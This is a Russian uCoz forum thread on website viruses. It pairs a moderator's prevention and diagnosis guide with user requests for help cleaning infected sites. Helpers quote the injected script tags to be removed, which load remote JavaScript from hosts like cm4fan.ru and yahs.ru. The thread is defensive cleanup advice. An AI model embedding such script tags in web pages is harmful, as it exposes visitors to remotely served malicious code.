Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Плюс2дргуга
    Сообщений: 6
    Репутация: 15

    Сообщение # 1291 | 20:14:46 11 Апр 2014
    Цитата webanet ()
    Плюс2дргуга, напишите в тех.поддержку яндекса с темой вирус на сайте

    Спасибо большое за ответ, уже воспользовался вашим советом
    Объявления о купле-продаже и заработке в сети http://mlm2drugаplus.ucоz.ru/
    Administrator3883
    Сообщений: 1
    Репутация: 0

    Сообщение # 1292 | 15:01:55 14 Апр 2014
    1) http://tula-kolodec.ru

    2) Все пользователи

    3) Не могу сделать скриншот, Принт скрин не реагирут...

    4) Браузеры не блокируют, только антивирус. Сервис "Яндекс" ругается на редирект с сайта для мобильного устройства. 2ip.ru тоже выявил заражение сайта.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1293 | 17:38:14 14 Апр 2014
    Administrator3883, напишите в тех.поддержку яндекса из вебмастера
    читайте тему //forum.ucoz.ru/forum/45-62018-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Batyanya
    Сообщений: 35
    Репутация: 3
    Уровень замечаний:

    Сообщение # 1294 | 13:54:23 18 Апр 2014

    1) При входе на сайт http://mymuzon.ucoz.ru/ после ввода логина, антивирус находит вирусы:
    http://prntscr.com/3b3od4

    2) При клике на сайте открываются баннеры и всякаягрязь:
    http://prntscr.com/3b3q12

    Как от всего этого избавиться
    P/S: Пароли только и успеваю менять каждую неделю, что
    ещё сделать – ломаю сайт как хотят???
    Nexxus
    Сообщений: 289
    Репутация: 66

    Сообщение # 1295 | 14:26:07 18 Апр 2014
    Лицензионный Avast! Internet Security вредоносного кода не видит.
    Batyanya
    Сообщений: 35
    Репутация: 3
    Уровень замечаний:

    Сообщение # 1296 | 15:05:01 18 Апр 2014
    Цитата Nexxus ()
    Лицензионный Avast! Internet Security вредоносного кода не видит.

    Мне то что от этого когда у меня:
    При клике на сайте открываются баннеры и всякая грязь:
    http://prntscr.com/3b3q12
    или что то подобное, значит где то что то сидит!
    КоневРоман
    Сообщений: 95
    Репутация: 2

    Сообщение # 1297 | 17:55:34 18 Апр 2014
    Помогите плиз)
    Как открываю сайт свой блокирует аваст и касперский.
    Причина .URL:h_polez-dno_ucoz_ru__|{gzip}
    Заражение:HTML:Script-inf

    Не могу найти где этот вирус.

    Помогите.
    Помог ты - помогут тебе!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1298 | 17:57:42 18 Апр 2014
    Рома3038, где адрес сайта
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    КоневРоман
    Сообщений: 95
    Репутация: 2

    Сообщение # 1299 | 18:06:29 18 Апр 2014
    http://polez-dno.ucoz.ru/
    http://polez-dno.ucoz.ru/
    http://polez-dno.ucoz.ru/
    Помог ты - помогут тебе!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1300 | 18:10:09 18 Апр 2014
    Рома3038, из информера топ пользователей удалить скрипт

    Код
    <script src="http://cm4fan.ru/none.js" type="text/javascript"></script>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Nexxus
    Сообщений: 289
    Репутация: 66

    Сообщение # 1301 | 02:58:34 19 Апр 2014
    Batyanya,
    Цитата Batyanya ()
    1) При входе на сайт http://mymuzon.ucoz.ru/ после ввода логина, антивирус находит вирусы:
    http://prntscr.com/3b3od4
    Цитата Nexxus ()
    Лицензионный Avast! Internet Security вредоносного кода не видит.
    Цитата Batyanya ()
    2) При клике на сайте открываются баннеры и всякаягрязь:
    http://prntscr.com/3b3q12

    Быть может стоит проверить систему на наличие вирусов?
    Сообщение отредактировал Nexxus - Суббота, 19 Апр 2014, 03:05:23
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1302 | 18:58:29 19 Апр 2014
    Batyanya, из блока форма входа удалите скрипт

    Код
    <script language='javascript' charset='UTF-8' type='text/javascript' src='http://yahs.ru/bdmg'></script>


    из нижней части шаблонов форума удалите скрипт

    Код
    <script type="text/javascript" src="http://bin-layer.ru/layer-15213-1-subid:20273.js"></script>


    и смените пароль uid профиля, которым администрируете сайт. инструкция по замене тут //forum.ucoz.ru/forum/45-52299-1 читайте внимательно
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    КоневРоман
    Сообщений: 95
    Репутация: 2

    Сообщение # 1303 | 20:51:48 19 Апр 2014
    Цитата webanet ()
    Рома3038, из информера топ пользователей удалить скрипт
    спасибо огромное!
    Помог ты - помогут тебе!
    vladya
    Сообщений: 5
    Репутация: 6

    Сообщение # 1304 | 10:52:09 20 Апр 2014
    Помогите пожалуйста, уже не представляю что делать...
    Сайт http://kriski-shkola.at.ua/
    Антивирус Касперский Internet Security 2014 лицензионный и полностью обновленный ничего не видит, гугл пишет что все ОК а вот яндекс матерится на поведенческий анализ.
    Я перепроверил весь код, оказалось что сайт на который ведет ссылка с моего сайта заблокирован яндексом и я ее удалил что бы яндекс отстал..
    но недавно заметил что если нажать на счетчик ucoz в статистике то один раз в сутки вместе со статистикой открывается какой то сайт на подобии опросника мейл.ру.
    Где оно сидит? Помогите пожалуйста найти.
    Если тебя друзья величают хакером, знай, ламер ты, ибо настоящего хакера не видно, не слышно и нет у него никаких друзей кроме компьютера.
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1305 | 11:07:25 20 Апр 2014
    vladya, обратитесь в поддержку яндекс, за деталями. Также для ознакомления //forum.ucoz.ru/forum/45-62018-1
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: